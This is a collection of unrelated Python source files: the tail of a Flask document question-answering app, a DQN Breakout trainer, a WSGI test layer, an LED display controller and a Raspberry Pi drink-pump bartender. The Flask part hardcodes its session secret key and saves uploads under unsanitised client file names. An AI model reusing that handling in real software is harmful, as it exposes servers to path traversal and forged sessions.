) # Replace with Elasticsearch(["http://elasticsearch:9200/"], verify_certs=True) to build docker image
session_time = 60 # Session Timeout in Minutes
app = Flask(__name__)
app.secret_key = "cbqa_123"
app.permanent_session_lifetime = timedelta(minutes=session_time)
user_id = 0  # Counter used to assign user IDs and track sessions and per-user context data
current_users = dict() # Used to store user id with time of login
user_doc_store = dict() # Document store object of the user id
user_settings = dict() # User settings for GPU and Pre-trained models choice
# Handles pre-processing the context and uploads the pre-processed context to Elasticsearch
# Each user is assigned with a separate Elasticsearch index starting with "user_{user_id}"
# Documents & textual context are deleted from the temp folder named with user_id under the users dir after uploading to Elasticsearch
def pre_process(user_id_key):
uploads_dir = "users/" + str(user_id_key) + "/uploads/"
try:
es_result = es.search(
index="user_" + str(user_id_key), body={"query": {"match_all": {}}}
)
no_docs = len(es_result["hits"]["hits"])
except Exception as e:
print(e)
print("\n no documents in es")
processed = convert_files_to_dicts(
dir_path=uploads_dir, clean_func=clean_wiki_text, split_paragraphs=True
)
for doc in range(len(processed)):
try:
# print("\n Checking for duplicate docs ..")
add_doc = True
for each_doc in range(no_docs):
doc_text = es_result["hits"]["hits"][each_doc]["_source"]["text"]
doc_name = es_result["hits"]["hits"][each_doc]["_source"]["name"]
doc_id = es_result["hits"]["hits"][each_doc]["_id"]
if (
processed[doc]["meta"]["name"] == "context_file.txt"
and doc_name == "context_file.txt"
):
# print("Deleting context file to update with new changes ..")
es.delete(
index="user_" + str(user_id_key), doc_type="_doc", id=doc_id
)
if processed[doc]["text"] == doc_text:
# print("\n There is a duplicate, So this document is not added ..")
add_doc = False
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
break
if add_doc:
# print("\n No duplicates found, so adding this to es..")
processed_lst = [processed[doc]]
user_doc_store[user_id_key].write_documents(processed_lst)
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
except Exception as e:
print(e)
# print("\n no documents in es")
processed_lst = [processed[doc]]
user_doc_store[user_id_key].write_documents(processed_lst)
os.remove(uploads_dir + str(processed[doc]["meta"]["name"]))
# Handles setting up reader and retriever
def set_finder(user_id_key):
if user_settings[user_id_key]["model"] == "roberta":
model_path = (
"deepset/roberta-base-squad2" # Path of the models hosted in Hugging Face
)
elif user_settings[user_id_key]["model"] == "bert":
model_path = "deepset/bert-large-uncased-whole-word-masking-squad2"
elif user_settings[user_id_key]["model"] == "distilbert":
model_path = "distilbert-base-uncased-distilled-squad"
else:
model_path = "illuin/camembert-base-fquad"
retriever = ElasticsearchRetriever(document_store=user_doc_store[user_id_key])
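    # TransformersReader's use_gpu is a device index here: 0 = first GPU, -1 = CPU.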
if user_settings[user_id_key]["gpu"] == "on":
try:
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=0
)
except Exception as e:
print(e)
print("GPU not available. Inferencing on CPU")
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=-1
)
else:
reader = TransformersReader(
model_name_or_path=model_path, tokenizer=model_path, use_gpu=-1
)
finder = Finder(reader, retriever)
return finder
# Deletes the user's context data from the server after the session expires and removes the user id from the tracking dicts
def user_session_timer():
global current_users, session_time
seconds_in_day = 24 * 60 * 60
print("\n User tracker thread started @ ", datetime.now())
while True:
for user_id_key in current_users.copy():
current_time = datetime.now()
user_time = current_users[user_id_key]
difference = current_time - user_time
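            # divmod(..., 60) gives elapsed time since login as (minutes, seconds).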
time_diff = divmod(
difference.days * seconds_in_day + difference.seconds, 60
)
if time_diff[0] >= session_time:
try:
del current_users[user_id_key]
del user_doc_store[user_id_key]
del user_settings[user_id_key]
shutil.rmtree("users/" + str(user_id_key))
es.indices.delete(
index="user_" + str(user_id_key), ignore=[400, 404]
)
except OSError as e:
print("Error: %s - %s." % (e.filename, e.strerror))
# print("\n Deleted user:", user_id_key, " @", datetime.now())
session_timer = threading.Thread(target=user_session_timer)
session_timer.start()
# Handles users w.r.t new session or already in session
@app.route("/")
def home():
global user_id, current_users, session_time
logging.info(
"User connected at "
+ str(datetime.now())
+ " with IP: "
+ str(request.environ["REMOTE_ADDR"])
)
if "user" in session and session["user"] in current_users:
user_id = session["user"]
logged_on = current_users[user_id]
current_time = datetime.now()
diff_min_sec = (
int(datetime.strftime(current_time, "%M"))
- int(datetime.strftime(logged_on, "%M"))
) * 60
diff_sec = int(datetime.strftime(current_time, "%S")) - int(
datetime.strftime(logged_on, "%S")
)
diff_time = diff_min_sec + diff_sec
time_left = (
session_time * 60
) - diff_time # For session timeout on client side
return render_template("index.html", time_left=time_left)
else:
session.permanent = True
current_time = datetime.now()
user_id += 1
current_users[user_id] = current_time
session["user"] = user_id
# print(current_users)
        # Create a per-user temp dir for uploaded context
        os.makedirs("users/" + str(user_id) + "/uploads")
user_doc_store[user_id] = ElasticsearchDocumentStore(
host="localhost", index="user_" + str(user_id)
) # Change host = "elasticsearch" to build docker image
user_settings[user_id] = {
"gpu": "off",
"model": "roberta",
} # Initial user settings
logged_on = current_users[user_id]
current_time = datetime.now()
diff_min_sec = (
int(datetime.strftime(current_time, "%M"))
- int(datetime.strftime(logged_on, "%M"))
) * 60
diff_sec = int(datetime.strftime(current_time, "%S")) - int(
datetime.strftime(logged_on, "%S")
)
diff_time = diff_min_sec + diff_sec
time_left = (
session_time * 60
) - diff_time # For session timeout on client side
return render_template("index.html", time_left=time_left)
# Handles context documents uploads
@app.route("/upload_file", methods=["GET", "POST"])
def upload_file():
global current_users
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
for f in request.files.getlist("file"):
f.save(
os.path.join("users/" + str(user_id_key) + "/uploads", f.filename)
)
pre_process(user_id_key)
return render_template("index.html")
else:
return redirect(url_for("session_timeout"))
else:
return redirect(url_for("session_timeout"))
# Handles context added through the textbox
@app.route("/context", methods=["POST"])
def context():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
text_context = request.form["context"]
context_file = open(
"users/" + str(user_id_key) + "/uploads/context_file.txt", "w"
)
context_file.write(text_context)
context_file.close()
pre_process(user_id_key)
return jsonify({"output": "" + text_context})
else:
return render_template("session_out.html")
else:
return redirect(url_for("session_timeout"))
# Provides extracted answers for the posted question
@app.route("/question", methods=["POST"])
def question():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
query_question = request.form["question"]
es_stats = es.indices.stats(index="user_" + str(user_id_key))
user_index_size = es_stats["_all"]["primaries"]["store"]["size_in_bytes"]
if (
user_index_size == 208
): # To check if index in Es is empty. 208 bytes is default index size without docs
return jsonify({"error": "add context"})
finder = set_finder(user_id_key)
answers_dict = finder.get_answers(
question=query_question, top_k_retriever=5, top_k_reader=5
)
unique_answers = list()
output = list()
if len(answers_dict["answers"]) > 0:
for i in range(len(answers_dict["answers"])):
if (
answers_dict["answers"][i]["answer"] is not None
and answers_dict["answers"][i]["answer"] not in unique_answers
):
temp_dict = answers_dict["answers"][i]
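                        # Scoring metadata stripped from each answer before it is returned to the client.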
remove = (
"score",
"probability",
"offset_start",
"offset_end",
"document_id",
)
unique_answers.append(temp_dict["answer"])
if temp_dict["meta"]["name"] == "context_file.txt":
temp_dict["meta"]["name"] = "Textual Context"
temp_dict["meta"] = temp_dict["meta"]["name"]
output.append(temp_dict)
for key in remove:
if key in temp_dict:
del temp_dict[key]
else:
output = [
{"answer": "No Answers found ..", "context": " ", "meta": " "},
]
return jsonify({"output": output})
else:
return render_template("session_out.html")
# Handles GPU setting changes.
@app.route("/gpu", methods=["POST"])
def gpu():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
if user_settings[user_id_key]["gpu"] == "on":
user_settings[user_id_key]["gpu"] = "off"
else:
user_settings[user_id_key]["gpu"] = "on"
return jsonify({"output": "gpu status changed"})
# Handles pre-trained model choice setting changes.
@app.route("/models", methods=["POST"])
def models():
if "user" in session:
user_id_key = session["user"]
if user_id_key in current_users:
user_settings[user_id_key]["model"] = request.form["model"]
return jsonify({"output": "model changed"})
# Handles session timeout redirection
@app.route("/session_timeout")
def session_timeout():
return render_template("session_out.html")
# Removes the session identifier from the session dict. This only works while the app tab stays open until the session completes.
@app.route("/session_out", methods=["POST"])
def session_out():
session.pop("user", None)
return redirect(url_for("session_timeout"))
# Comment the below block in case of building a docker image or running on WSGI server like gunicorn
if __name__ == "__main__":
app.run(host="0.0.0.0")
|
main.py
|
import torch
from src.data import DataManager
from src.policies import PolicyManagerNew, DeterministicPolicy, GreedyPolicy, AdvSwitchPolicy, RandomPolicy
from src.train import SamplingBuffer, Trainer
from src.envs.breakout import BreakoutWrapper
from src.utils import OptWrapper
import sys
import torch.multiprocessing as mp
import rnnbuilder as rb
run_id = sys.argv[1]
class CONFIG:
FRAME_STACK = 1 # amounts of input steps stacked into one input, put to 1 to disable frame stacking
NUM_ENVS = 16 # number of environments to be run in parallel for data generation, they share one network for parallel evaluation
BATCH_SIZE = 64 # batch size for training only
N_SEQ = 8 # number of elements in a sequence used for training recurrent networks, error signals are only generated for the last element and propagated for this many steps backward
TRAIN_DEVICE = torch.device('cuda') # device used for performing the main training loop
SAMPLING_DEVICE = torch.device('cuda') # where to store the replay buffer, may require significant gpu memory
DATA_DEVICE = torch.device('cuda') # where to run the network for data generation
GAMMA = 0.99 # reward decay parameter from classic q learning
UPDATE_RATE = 5000 # after how many training iterations the target network is updated
BUFFER_CAPACITY = 500000 # capacity of the replay buffer
START_LR = 1e-4 # base learning rate
FINAL_LR = 1e-5 # decay stops here
LR_DECAY = 0.998 # learning rate is multiplied by this factor every UPDATE_RATE iterations
START_TRAINING_AFTER = 50000 # training starts when the replay buffer is filled to this point
RANDOM_UNTIL = 100000 # a random policy is used for the first iterations, see policies below
DATA_MIN = 5 # minimum of data generated per training iteration
DATA_MAX = 10 # maximum of data generated per training iteration
TRANSFER_RATE = 1000 # after how many iterations training and data generation are synced, one process may wait until the above minimum and maximum are satisfied
CREATION_BUFFER = 15005 # buffer size for data generation, should be able to hold an episode of maximum length, needs to fit in shared memory
state_storage_type = torch.float16 # State is converted for storage for saving space
state_type = torch.float32 # This is the recovery type
# Testing parameters for weaker machines to test code
class CONFIG_HOME:
FRAME_STACK = 3
NUM_ENVS = 4
BATCH_SIZE = 32
N_SEQ = 5
TRAIN_DEVICE = torch.device('cuda')
SAMPLING_DEVICE = torch.device('cuda')
DATA_DEVICE = torch.device('cuda')
GAMMA = 0.99
UPDATE_RATE = 500
BUFFER_CAPACITY = 20000#200000
START_LR = 1e-4 # base learning rate
FINAL_LR = 1e-5 # decay stops here
LR_DECAY = 0.998
START_TRAINING_AFTER = 5000
RANDOM_UNTIL = 30000
DATA_MIN = 5
DATA_MAX = 10
TRANSFER_RATE = 500
CREATION_BUFFER = 15005
state_storage_type = torch.float16
state_type = torch.float32
if run_id == 'home':
CONFIG = CONFIG_HOME
EnvClass = BreakoutWrapper  # multi-environment class, see /envs/breakout.py
det_pol = DeterministicPolicy()
policies = [ # The set of policies used for data generation
det_pol,
AdvSwitchPolicy(det_pol, DeterministicPolicy(), GreedyPolicy(0.1)), # Switches to a greedy policy later in an episode
GreedyPolicy(0.1),
RandomPolicy()
]
change_list = [ # priority of the above policies over time (played steps)
(0, [0, 0, 0, 1]), # in the beginning only random policy
(CONFIG.RANDOM_UNTIL, [1, 1, 1, 0]) # after that the other 3 policies are equally played
]
CONV_NEURON = rb.nn.ReLU()
conv_stack = rb.Sequential(
rb.rnn.TempConvPlus2d(out_channels=32, kernel_size=8, stride=4, time_kernel_size=CONFIG.FRAME_STACK), CONV_NEURON,
rb.nn.Conv2d(out_channels=64, kernel_size=4, stride=2), CONV_NEURON,
rb.nn.Conv2d(out_channels=64, kernel_size=3, stride=1), CONV_NEURON)
ll_lstm = rb.rnn.LSTM(512)
ll_ffann = rb.Sequential(rb.nn.Linear(512), rb.nn.ReLU())
LAST_LAYER = ll_lstm
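# Q-network: conv feature extractor, then a recurrent (LSTM) or feed-forward last layer, then a linear head with one output per action (EnvClass.n_out).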
factory = rb.Sequential(conv_stack, LAST_LAYER, rb.nn.Linear(EnvClass.n_out))
def make_model():
return factory.make_model(EnvClass.input_shape)
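# Runs in a separate process: plays the parallel environments with the current policy mix and ships the generated data to the trainer via the queues in comms.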
def data_process(comms):
env = EnvClass(CONFIG.NUM_ENVS)
data_net = make_model().to(CONFIG.DATA_DEVICE)
policy_manager = PolicyManagerNew(policies, change_list, f'saves/results/results_{run_id}.json')
dataM = DataManager(policy_manager, env, data_net, comms, CONFIG)
dataM.run()
if __name__ == '__main__':
ctx = mp.get_context('spawn')
data_to_train = ctx.Queue()
train_to_data = ctx.Queue()
condition = ctx.Condition()
comms = {
'data_to_train': data_to_train,
'train_to_data': train_to_data,
'condition': condition
}
dp = ctx.Process(target=data_process, args=(comms,))
dp.start()
train_net = make_model().to(CONFIG.TRAIN_DEVICE)
target_net = make_model().to(CONFIG.TRAIN_DEVICE)
target_net.load_state_dict(train_net.state_dict())
target_net.configure(full_state=True)
criterion = torch.nn.MSELoss()
opt = OptWrapper(train_net.parameters(), CONFIG)
sampling_buffer = SamplingBuffer(EnvClass, train_net.get_initial_state(1), CONFIG)
trainer = Trainer(train_net, target_net, EnvClass, comms, CONFIG.GAMMA, sampling_buffer, opt, criterion)
trainer.run(run_id, CONFIG)
|
__init__.py
|
from wsgiref.simple_server import WSGIRequestHandler
from wsgiref.simple_server import WSGIServer
import os
import plone.testing
import threading
import wsgiref.handlers
class LogWSGIRequestHandler(WSGIRequestHandler):
def log_request(self, *args):
if 'GOCEPT_HTTP_VERBOSE_LOGGING' in os.environ:
WSGIRequestHandler.log_request(self, *args)
class Layer(plone.testing.Layer):
port = 0 # choose automatically
request_handler_class = LogWSGIRequestHandler
def __init__(self, *args, **kw):
super().__init__(*args, **kw)
self.wsgi_app = None
@property
def wsgi_app(self):
return self.get('wsgi_app', self._wsgi_app)
@wsgi_app.setter
def wsgi_app(self, value):
self._wsgi_app = value
@property
def host(self):
return os.environ.get('GOCEPT_HTTP_APP_HOST', 'localhost')
def setUp(self):
self['httpd'] = WSGIServer((self.host, self.port),
self.request_handler_class)
port = self['httpd'].server_port
self['http_host'] = self.host
self['http_port'] = port
self['http_address'] = f'{self.host}:{port}'
self['httpd'].set_app(self.wsgi_app)
self['httpd_thread'] = threading.Thread(target=self.serve)
self['httpd_thread'].daemon = True
self['httpd_thread'].start()
orig_flush = self['_orig_handler_flush'] = (
wsgiref.handlers.SimpleHandler._flush)
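        # Patch wsgiref's flush so a client that hangs up early (broken pipe, errno 32) does not raise during tests.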
def silent_flush(self):
try:
orig_flush(self)
except OSError as e:
if e.args[0] != 32:
raise
wsgiref.handlers.SimpleHandler._flush = silent_flush
def tearDown(self):
self.shutdown()
self['httpd_thread'].join(5)
if self['httpd_thread'].is_alive():
raise RuntimeError('WSGI server could not be shut down')
# make the server really go away and give up the socket
del self['httpd']
del self['httpd_thread']
del self['http_host']
del self['http_port']
del self['http_address']
wsgiref.handlers.SimpleHandler._flush = self['_orig_handler_flush']
del self['_orig_handler_flush']
def serve(self):
self['httpd'].serve_forever()
def shutdown(self):
self['httpd'].shutdown()
self['httpd'].server_close()
class FixupMiddleware:
"""Fix problems between WSGI server and middlewares."""
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
# gocept.httpserverlayer uses wsgiref but
# wsgiref.simple_server.ServerHandler.start_response bails when it
# sees the 'Connection' header, so we remove it here:
def clean_start_response(status, headers, exc_info):
headers = [(k, v) for (k, v) in headers if k != 'Connection']
return start_response(status, headers, exc_info)
return self.app(environ, clean_start_response)
|
led8x8controller.py
|
#!/usr/bin/python3
""" Control the display of an Adafruit 8x8 LED backpack """
# MIT License
#
# Copyright (c) 2019 Dave Wilson
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
from threading import Thread
import logging
import logging.config
import led8x8idle
import led8x8flash
import led8x8fibonacci
import led8x8motion
import led8x8wopr
import led8x8life
# Color values as convenient globals.
OFF = 0
GREEN = 1
RED = 2
YELLOW = 3
# state machine modes
IDLE_STATE = 0
DEMO_STATE = 1
SECURITY_STATE = 2
# display modes
FIRE_MODE = 0
PANIC_MODE = 1
FIBONACCI_MODE = 2
WOPR_MODE = 3
LIFE_MODE = 4
logging.config.fileConfig(fname='/home/an/diyclock/logging.ini', disable_existing_loggers=False)
# Get the logger specified in the file
LOGGER = logging.getLogger(__name__)
LOGGER.info('Application started')
class ModeController:
""" control changing modes. note Fire and Panic are externally controlled. """
def __init__(self,):
""" create mode control variables """
self.machine_state = DEMO_STATE
self.current_mode = FIBONACCI_MODE
self.last_mode = LIFE_MODE
self.start_time = time.time()
def set_state(self, state):
""" set the display mode """
self.machine_state = state
def get_state(self,):
""" get the display mode """
return self.machine_state
def set_mode(self, mode):
""" set the display mode """
self.last_mode = self.current_mode
self.current_mode = mode
self.start_time = time.time()
def restore_mode(self,):
""" set or override the display mode """
self.current_mode = self.last_mode
self.start_time = time.time()
def get_mode(self,):
""" get current the display mode """
return self.current_mode
def evaluate(self,):
""" initialize and start the fibinnocci display """
now_time = time.time()
elapsed = now_time - self.start_time
if elapsed > 60:
self.last_mode = self.current_mode
self.current_mode = self.current_mode + 1
self.start_time = now_time
if self.current_mode > LIFE_MODE:
self.current_mode = FIBONACCI_MODE
#pylint: disable=too-many-instance-attributes
class Led8x8Controller:
""" Idle or sleep pattern """
def __init__(self, matrix8x8,):
""" create initial conditions and saving display and I2C lock """
self.matrix8x8 = matrix8x8
self.matrix8x8.clear()
self.mode_controller = ModeController()
self.idle = led8x8idle.Led8x8Idle(self.matrix8x8)
self.fire = led8x8flash.Led8x8Flash(self.matrix8x8, RED)
self.panic = led8x8flash.Led8x8Flash(self.matrix8x8, YELLOW)
self.fib = led8x8fibonacci.Led8x8Fibonacci(self.matrix8x8)
self.motion = led8x8motion.Led8x8Motion(self.matrix8x8)
self.wopr = led8x8wopr.Led8x8Wopr(self.matrix8x8)
self.life = led8x8life.Led8x8Life(self.matrix8x8)
self.error_count = 0
def reset(self,):
""" initialize to starting state and set brightness """
self.mode_controller.set_state(DEMO_STATE)
self.mode_controller.set_mode(FIBONACCI_MODE)
def display_thread(self,):
""" display the series as a 64 bit image with alternating colored pixels """
while True:
try:
mode = self.mode_controller.get_mode()
if mode == FIRE_MODE:
self.fire.display()
elif mode == PANIC_MODE:
self.panic.display()
else:
state = self.mode_controller.get_state()
if state == SECURITY_STATE:
self.motion.display()
elif state == IDLE_STATE:
self.idle.display()
else: #demo
if mode == FIBONACCI_MODE:
self.fib.display()
elif mode == WOPR_MODE:
self.wopr.display()
elif mode == LIFE_MODE:
self.life.display()
self.mode_controller.evaluate()
#pylint: disable=broad-except
except Exception as ex:
LOGGER.info('Led8x8Controller: thread exception: %s %s', str(ex),
str(self.error_count))
self.error_count += 1
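                # Try to re-initialize the display a few times before giving up and ending the thread.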
if self.error_count < 10:
time.sleep(1.0)
self.matrix8x8.begin()
else:
break
def set_mode(self, mode, override=False):
""" set display mode """
if override:
self.mode_controller.set_mode(mode)
current_mode = self.mode_controller.get_mode()
if current_mode in (FIRE_MODE, PANIC_MODE):
return
self.mode_controller.set_mode(mode)
def restore_mode(self,):
""" return to last mode; usually after idle, fire or panic """
self.mode_controller.restore_mode()
def set_state(self, state):
""" set the machine state """
self.mode_controller.set_state(state)
def get_state(self,):
""" get the current machine state """
return self.mode_controller.get_state()
def update_motion(self, topic):
""" update the countdown timer for the topic (room)"""
self.motion.motion_detected(topic)
def run(self):
""" start the display thread and make it a daemon """
display = Thread(target=self.display_thread)
display.daemon = True
display.start()
if __name__ == '__main__':
sys.exit()
|
bartender.py
|
import gaugette.ssd1306
import gaugette.platform
import gaugette.gpio
import gaugette.spi
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
from dotstar import Adafruit_DotStar
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
GPIO.setmode(GPIO.BCM)
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000
OLED_RESET_PIN = 15
OLED_DC_PIN = 16
NUMBER_NEOPIXELS = 45
NEOPIXEL_DATA_PIN = 26
NEOPIXEL_CLOCK_PIN = 6
NEOPIXEL_BRIGHTNESS = 64
FLOW_RATE = 60.0/100.0
class Bartender(MenuDelegate):
def __init__(self):
self.running = False
# set the oled screen height
self.screen_width = SCREEN_WIDTH
self.screen_height = SCREEN_HEIGHT
self.btn1Pin = LEFT_BTN_PIN
self.btn2Pin = RIGHT_BTN_PIN
        # configure interrupts for buttons
GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
# configure screen
spi_bus = 0
spi_device = 0
gpio = gaugette.gpio.GPIO()
spi = gaugette.spi.SPI(spi_bus, spi_device)
# Very important... This lets py-gaugette 'know' what pins to use in order to reset the display
self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width) # Change rows & cols values depending on your display dimensions.
self.led.begin()
self.led.clear_display()
self.led.display()
self.led.invert_display()
time.sleep(0.5)
self.led.normal_display()
time.sleep(0.5)
# load the pump configuration from file
self.pump_configuration = Bartender.readPumpConfiguration()
for pump in self.pump_configuration.keys():
GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)
# setup pixels:
self.numpixels = NUMBER_NEOPIXELS # Number of LEDs in strip
# Here's how to control the strip from any two GPIO pins:
datapin = NEOPIXEL_DATA_PIN
clockpin = NEOPIXEL_CLOCK_PIN
self.strip = Adafruit_DotStar(self.numpixels, datapin, clockpin)
self.strip.begin() # Initialize pins for output
self.strip.setBrightness(NEOPIXEL_BRIGHTNESS) # Limit brightness to ~1/4 duty cycle
# turn everything off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
print "Done initializing"
@staticmethod
def readPumpConfiguration():
return json.load(open('pump_config.json'))
@staticmethod
def writePumpConfiguration(configuration):
with open("pump_config.json", "w") as jsonFile:
json.dump(configuration, jsonFile)
def startInterrupts(self):
GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)
def stopInterrupts(self):
GPIO.remove_event_detect(self.btn1Pin)
GPIO.remove_event_detect(self.btn2Pin)
def buildMenu(self, drink_list, drink_options):
# create a new main menu
m = Menu("Main Menu")
# add drink options
drink_opts = []
for d in drink_list:
drink_opts.append(MenuItem('drink', d["name"], {"ingredients": d["ingredients"]}))
configuration_menu = Menu("Configure")
# add pump configuration options
pump_opts = []
for p in sorted(self.pump_configuration.keys()):
config = Menu(self.pump_configuration[p]["name"])
# add fluid options for each pump
for opt in drink_options:
# star the selected option
selected = "*" if opt["value"] == self.pump_configuration[p]["value"] else ""
config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
# add a back button so the user can return without modifying
config.addOption(Back("Back"))
config.setParent(configuration_menu)
pump_opts.append(config)
# add pump menus to the configuration menu
configuration_menu.addOptions(pump_opts)
# add a back button to the configuration menu
configuration_menu.addOption(Back("Back"))
# adds an option that cleans all pumps to the configuration menu
configuration_menu.addOption(MenuItem('clean', 'Clean'))
configuration_menu.setParent(m)
m.addOptions(drink_opts)
m.addOption(configuration_menu)
# create a menu context
self.menuContext = MenuContext(m, self)
def filterDrinks(self, menu):
"""
Removes any drinks that can't be handled by the pump configuration
"""
for i in menu.options:
if (i.type == "drink"):
i.visible = False
ingredients = i.attributes["ingredients"]
presentIng = 0
for ing in ingredients.keys():
for p in self.pump_configuration.keys():
if (ing == self.pump_configuration[p]["value"]):
presentIng += 1
if (presentIng == len(ingredients.keys())):
i.visible = True
elif (i.type == "menu"):
self.filterDrinks(i)
def selectConfigurations(self, menu):
"""
Adds a selection star to the pump configuration option
"""
for i in menu.options:
if (i.type == "pump_selection"):
key = i.attributes["key"]
if (self.pump_configuration[key]["value"] == i.attributes["value"]):
i.name = "%s %s" % (i.attributes["name"], "*")
else:
i.name = i.attributes["name"]
elif (i.type == "menu"):
self.selectConfigurations(i)
def prepareForRender(self, menu):
self.filterDrinks(menu)
self.selectConfigurations(menu)
return True
def menuItemClicked(self, menuItem):
if (menuItem.type == "drink"):
self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
return True
elif(menuItem.type == "pump_selection"):
self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
Bartender.writePumpConfiguration(self.pump_configuration)
return True
elif(menuItem.type == "clean"):
self.clean()
return True
return False
def clean(self):
waitTime = 20
pumpThreads = []
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
for pump in self.pump_configuration.keys():
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(waitTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def displayMenuItem(self, menuItem):
print menuItem.name
self.led.clear_display()
self.led.draw_text2(0,20,menuItem.name,2)
self.led.display()
def cycleLights(self):
t = threading.currentThread()
head = 0 # Index of first 'on' pixel
tail = -10 # Index of last 'off' pixel
color = 0xFF0000 # 'On' color (starts red)
while getattr(t, "do_run", True):
self.strip.setPixelColor(head, color) # Turn on 'head' pixel
self.strip.setPixelColor(tail, 0) # Turn off 'tail'
self.strip.show() # Refresh strip
time.sleep(1.0 / 50) # Pause 20 milliseconds (~50 fps)
head += 1 # Advance head position
if(head >= self.numpixels): # Off end of strip?
head = 0 # Reset to start
color >>= 8 # Red->green->blue->black
if(color == 0): color = 0xFF0000 # If black, reset to red
tail += 1 # Advance tail position
if(tail >= self.numpixels): tail = 0 # Off end? Reset
def lightsEndingSequence(self):
# make lights green
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0xFF0000)
self.strip.show()
time.sleep(5)
# turn lights off
for i in range(0, self.numpixels):
self.strip.setPixelColor(i, 0)
self.strip.show()
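    # The pump pins are active-low: LOW turns a pump on, HIGH (the initial state) turns it off.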
def pour(self, pin, waitTime):
GPIO.output(pin, GPIO.LOW)
time.sleep(waitTime)
GPIO.output(pin, GPIO.HIGH)
def progressBar(self, waitTime):
interval = waitTime / 100.0
for x in range(1, 101):
self.led.clear_display()
self.updateProgressBar(x, y=35)
self.led.display()
time.sleep(interval)
def makeDrink(self, drink, ingredients):
# cancel any button presses while the drink is being made
# self.stopInterrupts()
self.running = True
# launch a thread to control lighting
lightsThread = threading.Thread(target=self.cycleLights)
lightsThread.start()
# Parse the drink ingredients and spawn threads for pumps
maxTime = 0
pumpThreads = []
for ing in ingredients.keys():
for pump in self.pump_configuration.keys():
if ing == self.pump_configuration[pump]["value"]:
waitTime = ingredients[ing] * FLOW_RATE
if (waitTime > maxTime):
maxTime = waitTime
pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
pumpThreads.append(pump_t)
# start the pump threads
for thread in pumpThreads:
thread.start()
# start the progress bar
self.progressBar(maxTime)
# wait for threads to finish
for thread in pumpThreads:
thread.join()
# show the main menu
self.menuContext.showMenu()
# stop the light thread
lightsThread.do_run = False
lightsThread.join()
# show the ending sequence lights
self.lightsEndingSequence()
# sleep for a couple seconds to make sure the interrupts don't get triggered
time.sleep(2);
# reenable interrupts
# self.startInterrupts()
self.running = False
def left_btn(self, ctx):
if not self.running:
self.menuContext.advance()
def right_btn(self, ctx):
if not self.running:
self.menuContext.select()
def updateProgressBar(self, percent, x=15, y=15):
height = 10
width = self.screen_width-2*x
for w in range(0, width):
self.led.draw_pixel(w + x, y)
self.led.draw_pixel(w + x, y + height)
for h in range(0, height):
self.led.draw_pixel(x, h + y)
self.led.draw_pixel(self.screen_width-x, h + y)
for p in range(0, percent):
p_loc = int(p/100.0*width)
self.led.draw_pixel(x + p_loc, h + y)
def run(self):
self.startInterrupts()
# main loop
try:
while True:
time.sleep(0.1)
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
traceback.print_exc()
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
bartender.run()
|
Vision.py
|
from threading import Thread, Event
import cv2
#import time
import datetime
import uuid
import os
#This class is used to approximate the processing frames per second
#This class has no functional purpose per se, strictly for information
class FPS:
def __init__(self):
self._start = None
self._end = None
